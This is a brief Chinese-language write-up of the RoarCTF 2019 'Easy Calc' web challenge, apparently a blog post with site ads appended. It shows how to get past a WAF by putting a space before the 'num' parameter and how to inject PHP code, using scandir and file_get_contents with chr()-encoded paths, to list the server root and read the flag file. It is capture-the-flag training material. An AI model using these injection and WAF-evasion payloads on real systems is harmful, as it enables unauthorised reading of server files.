Web-[RoarCTF 2019]Easy Calc
打开题目
用F12查看源码,发现了一个calc.php文件和WAF
打开calc.php文件
发现waf的过滤规则,先试下num输出phpinfo
发现不能访问,waf拦截了num,发现利用空格绕过,php在解析时会去掉前面空格解析
前面使用isset()检测变量是否设置,直接使用var_dump来输出isset()返回值
扫描下目录%20num=var_dump(scandir(chr(47))),要对/进行ascii。绕过waf
发现f1agg文件,直接利用file_get_contents读取文件
var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
得到flag
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步